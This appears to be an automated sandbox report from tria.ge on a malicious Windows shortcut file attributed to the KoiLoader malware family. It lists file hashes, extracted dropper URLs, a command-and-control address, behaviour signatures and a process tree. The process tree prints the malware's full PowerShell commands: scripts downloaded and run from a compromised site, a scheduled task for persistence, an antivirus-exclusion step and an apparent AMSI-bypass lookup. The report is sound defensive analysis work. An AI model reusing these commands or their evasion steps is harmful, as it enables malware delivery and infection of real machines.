Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    574s
  • max time network
    572s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/03/2025, 08:28

General

  • Target

    7d7319a069e4ce6453f554bd52c6103db586c3615e8f1bbc59748b11b2c9a926.lnk

  • Size

    1KB

  • MD5

    4faa35703e3c7a20143562b271ceca2f

  • SHA1

    2d87ff75eb532029ab63ed68971471589f28a847

  • SHA256

    7d7319a069e4ce6453f554bd52c6103db586c3615e8f1bbc59748b11b2c9a926

  • SHA512

    ab0659b71b2a6593a288d1fe869f3615dea4eb3684df62670f1bfb38b342a8a529fa933ee78743aa162d474ffaad7b9e381f6c3186d2bed798fb27f3bfa09133

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://www.centralelatterieti.com/wp-content/uploads/2020/obviation3S0.php

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://www.centralelatterieti.com/wp-content/uploads/2020/dazementxdy7.php

exe.dropper

https://www.centralelatterieti.com/wp-content/uploads/2020/subgularExtK.ps1

Extracted

Family

koiloader

C2

http://178.17.170.209/overglass.php

Attributes
  • payload_url

    https://www.centralelatterieti.com/wp-content/uploads/2020

Signatures

  • KoiLoader

    KoiLoader is a malware loader written in C++.

  • Koiloader family
  • Detects KoiLoader payload 1 IoCs
  • Blocklisted process makes network request 12 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Powershell Invoke Web Request.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Indicator Removal: Clear Persistence 1 TTPs 1 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\7d7319a069e4ce6453f554bd52c6103db586c3615e8f1bbc59748b11b2c9a926.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3444
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $pdw = $env:programdata + '\' + ('778ycf5h9kz2sm.js iagx9x77v'); $dwnf='Dow'+'nl'+'oadF'+'ile'; $b10frxwtardxmxv8j = New-Object Net.WebClient; $wsd = $b10frxwtardxmxv8j.DownloadString('https://www.centralelatterieti.com/wp-content/uploads/2020/obviation3S0.php'); $b10frxwtardxmxv8j.$dwnf('https://www.centralelatterieti.com/wp-content/uploads/2020/commendedtz4.php', '778ycf5h9kz2sm.js'); $b10frxwtardxmxv8j.$dwnf('https://www.centralelatterieti.com/wp-content/uploads/2020/caninusAXRu.php', 'iagx9x77v.js'); . ('scht'+'as'+'ks') /create /sc minute /mo 1 /f /tr ($wsd + $pdw) /tn iagx9x77v;
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1100
      • C:\Windows\system32\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\ProgramData\778ycf5h9kz2sm.js iagx9x77v" /tn iagx9x77v
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:4916
  • C:\Windows\system32\wscript.EXE
    C:\Windows\system32\wscript.EXE C:\ProgramData\778ycf5h9kz2sm.js iagx9x77v
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4192
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "schtasks /delete /tn iagx9x77v /f; wscript $env:programdata\iagx9x77v.js "
      2⤵
      • Indicator Removal: Clear Persistence
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4892
      • C:\Windows\system32\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /delete /tn iagx9x77v /f
        3⤵
          PID:4240
        • C:\Windows\system32\wscript.exe
          "C:\Windows\system32\wscript.exe" C:\ProgramData\iagx9x77v.js
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:3068
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$tp=[Ref].Assembly.GetTypes();$ppa = 'https://www.centralelatterieti.com/wp-content/uploads/2020/dazementxdy7.php'; $dnl = $null; $ppb = 'https://www.centralelatterieti.com/wp-content/uploads/2020/subgularExtK.ps1'; Foreach($tt in $tp) {if ($tt.Name -like '*m?iUt*s') {$c=$tt}}; $env:paths = '7zDZHF5BAPAF'; IEX(Invoke-WebRequest -UseBasicParsing $ppa); IEX(Invoke-WebRequest -UseBasicParsing $ppb)"
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2252
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "powershell -command IEX(IWR -UseBasicParsing 'https://www.centralelatterieti.com/wp-content/uploads/2020/sd2.ps1')"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2652
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command IEX(IWR -UseBasicParsing 'https://www.centralelatterieti.com/wp-content/uploads/2020/sd2.ps1')
                6⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4612
    • C:\Windows\SysWOW64\DllHost.exe
      C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
      1⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2076
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4212
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4772
    • C:\Windows\System32\wscript.exe
      C:\Windows\System32\wscript.exe "C:\ProgramData\r54ce9d30-8a1e-4751-a619-b7b25aad0faer.js"
      1⤵
        PID:4328
      • C:\Windows\System32\wscript.exe
        C:\Windows\System32\wscript.exe "C:\ProgramData\r54ce9d30-8a1e-4751-a619-b7b25aad0faer.js"
        1⤵
          PID:3124
        • C:\Windows\System32\wscript.exe
          C:\Windows\System32\wscript.exe "C:\ProgramData\r54ce9d30-8a1e-4751-a619-b7b25aad0faer.js"
          1⤵
            PID:2132
          • C:\Windows\System32\wscript.exe
            C:\Windows\System32\wscript.exe "C:\ProgramData\r54ce9d30-8a1e-4751-a619-b7b25aad0faer.js"
            1⤵
              PID:3692
            • C:\Windows\System32\wscript.exe
              C:\Windows\System32\wscript.exe "C:\ProgramData\r54ce9d30-8a1e-4751-a619-b7b25aad0faer.js"
              1⤵
                PID:2416
              • C:\Windows\System32\wscript.exe
                C:\Windows\System32\wscript.exe "C:\ProgramData\r54ce9d30-8a1e-4751-a619-b7b25aad0faer.js"
                1⤵
                  PID:496
                • C:\Windows\System32\wscript.exe
                  C:\Windows\System32\wscript.exe "C:\ProgramData\r54ce9d30-8a1e-4751-a619-b7b25aad0faer.js"
                  1⤵
                    PID:4244
                  • C:\Windows\System32\wscript.exe
                    C:\Windows\System32\wscript.exe "C:\ProgramData\r54ce9d30-8a1e-4751-a619-b7b25aad0faer.js"
                    1⤵
                      PID:1888
                    • C:\Windows\System32\wscript.exe
                      C:\Windows\System32\wscript.exe "C:\ProgramData\r54ce9d30-8a1e-4751-a619-b7b25aad0faer.js"
                      1⤵
                        PID:4708

                      Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\ProgramData\778ycf5h9kz2sm.js

                        Filesize

                        198B

                        MD5

                        af9f1f2076317c03e21d56367e638af4

                        SHA1

                        61c4f850591f851acd3108104ef14f0fe32f95a6

                        SHA256

                        70835a8f7ea6c93942935a6f9fef1ae4591c22e873e3b06000ef01437f2090c1

                        SHA512

                        c280492024a902e3988c88dca7e21fc622df1bdf66796d9baf06a3b393550ac3d771589b0c51e7c246991d314c0729e7631cd1c08ba575683d9abdef7295b29c

                      • C:\ProgramData\iagx9x77v.js

                        Filesize

                        1KB

                        MD5

                        ebb123c6a1353433349dbadfb05904cf

                        SHA1

                        a3e08bc23bca1cf47a298f3e28cd2c59a7f8a49f

                        SHA256

                        432ade0df36cd198d631114877eb69dbbf4e2a273c29cbbfc225943c32bf0e98

                        SHA512

                        5e42b9b39191571920f3b69039f578724bb430033fea30c1735835307a18c6b35b7435474b193540e3124c9ef9dbb191c7d5ee03f958ac6ecbbae8194791664e

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                        Filesize

                        2KB

                        MD5

                        2f57fde6b33e89a63cf0dfdd6e60a351

                        SHA1

                        445bf1b07223a04f8a159581a3d37d630273010f

                        SHA256

                        3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                        SHA512

                        42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                        Filesize

                        2KB

                        MD5

                        968cb9309758126772781b83adb8a28f

                        SHA1

                        8da30e71accf186b2ba11da1797cf67f8f78b47c

                        SHA256

                        92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

                        SHA512

                        4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        1KB

                        MD5

                        bc8daa62f50771d68b9496656718c281

                        SHA1

                        7740eab59923d241d547813ac1456d5156e21969

                        SHA256

                        c868cf713934c6173a94a78f16afa7eabe74b9c5968ec07f179794974f93497f

                        SHA512

                        b700050ac573e804710876bb88ecb0235c9fee67b21e670e91620685ab4bd52b7aaf390e61c1f814adcceb2d95bdbdaa8240a4a2bdf04036470c0db22a264f6d

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        1KB

                        MD5

                        2b856bda56945fa7252034b16c0189f0

                        SHA1

                        df2d4ff8394cc57a8c399bfb5602679bfdcde06b

                        SHA256

                        ffc29461bd43b0ffffa1c06c260f5089cce205cab26a1a1032b924272b718205

                        SHA512

                        8843b6d91163d345e2aded8143d941388852ed3d4aa39ced89a3cf8a50bb908681624a7008c0b82359736cc3222f7908a1c34442028491921d243c0581aeb3e9

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        64B

                        MD5

                        d8b9a260789a22d72263ef3bb119108c

                        SHA1

                        376a9bd48726f422679f2cd65003442c0b6f6dd5

                        SHA256

                        d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

                        SHA512

                        550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2bkrilme.uqp.ps1

                        Filesize

                        60B

                        MD5

                        d17fe0a3f47be24a6453e9ef58c94641

                        SHA1

                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                        SHA256

                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                        SHA512

                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                      • memory/1100-13-0x00007FFAD2B90000-0x00007FFAD3651000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/1100-14-0x00007FFAD2B90000-0x00007FFAD3651000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/1100-19-0x00007FFAD2B90000-0x00007FFAD3651000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/1100-12-0x0000023CCEA80000-0x0000023CCEAA2000-memory.dmp

                        Filesize

                        136KB

                      • memory/1100-2-0x00007FFAD2B93000-0x00007FFAD2B95000-memory.dmp

                        Filesize

                        8KB

                      • memory/2252-54-0x00000000076B0000-0x0000000007D2A000-memory.dmp

                        Filesize

                        6.5MB

                      • memory/2252-56-0x0000000007E70000-0x0000000007E7D000-memory.dmp

                        Filesize

                        52KB

                      • memory/2252-49-0x0000000005A40000-0x0000000005D94000-memory.dmp

                        Filesize

                        3.3MB

                      • memory/2252-38-0x0000000005150000-0x00000000051B6000-memory.dmp

                        Filesize

                        408KB

                      • memory/2252-51-0x0000000006070000-0x000000000608E000-memory.dmp

                        Filesize

                        120KB

                      • memory/2252-52-0x00000000060A0000-0x00000000060EC000-memory.dmp

                        Filesize

                        304KB

                      • memory/2252-53-0x0000000006470000-0x000000000648A000-memory.dmp

                        Filesize

                        104KB

                      • memory/2252-37-0x00000000050B0000-0x00000000050D2000-memory.dmp

                        Filesize

                        136KB

                      • memory/2252-55-0x0000000007DD0000-0x0000000007DD1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2252-39-0x00000000051C0000-0x0000000005226000-memory.dmp

                        Filesize

                        408KB

                      • memory/2252-35-0x0000000002750000-0x0000000002786000-memory.dmp

                        Filesize

                        216KB

                      • memory/2252-36-0x0000000005290000-0x00000000058B8000-memory.dmp

                        Filesize

                        6.2MB

                      • memory/4612-104-0x0000000008480000-0x0000000008512000-memory.dmp

                        Filesize

                        584KB

                      • memory/4612-100-0x00000000081C0000-0x00000000081E2000-memory.dmp

                        Filesize

                        136KB

                      • memory/4612-103-0x0000000008390000-0x00000000083E0000-memory.dmp

                        Filesize

                        320KB

                      • memory/4612-102-0x0000000008240000-0x000000000825A000-memory.dmp

                        Filesize

                        104KB

                      • memory/4612-101-0x00000000088B0000-0x0000000008E54000-memory.dmp

                        Filesize

                        5.6MB

                      • memory/4772-81-0x0000000007AE0000-0x0000000007B83000-memory.dmp

                        Filesize

                        652KB

                      • memory/4772-95-0x0000000007E40000-0x0000000007E54000-memory.dmp

                        Filesize

                        80KB

                      • memory/4772-96-0x0000000007F40000-0x0000000007F5A000-memory.dmp

                        Filesize

                        104KB

                      • memory/4772-97-0x0000000007F20000-0x0000000007F28000-memory.dmp

                        Filesize

                        32KB

                      • memory/4772-94-0x0000000007E30000-0x0000000007E3E000-memory.dmp

                        Filesize

                        56KB

                      • memory/4772-84-0x0000000007E00000-0x0000000007E11000-memory.dmp

                        Filesize

                        68KB

                      • memory/4772-83-0x0000000007E80000-0x0000000007F16000-memory.dmp

                        Filesize

                        600KB

                      • memory/4772-82-0x0000000007C70000-0x0000000007C7A000-memory.dmp

                        Filesize

                        40KB

                      • memory/4772-80-0x0000000006E50000-0x0000000006E6E000-memory.dmp

                        Filesize

                        120KB

                      • memory/4772-69-0x0000000007AA0000-0x0000000007AD2000-memory.dmp

                        Filesize

                        200KB

                      • memory/4772-70-0x0000000070340000-0x000000007038C000-memory.dmp

                        Filesize

                        304KB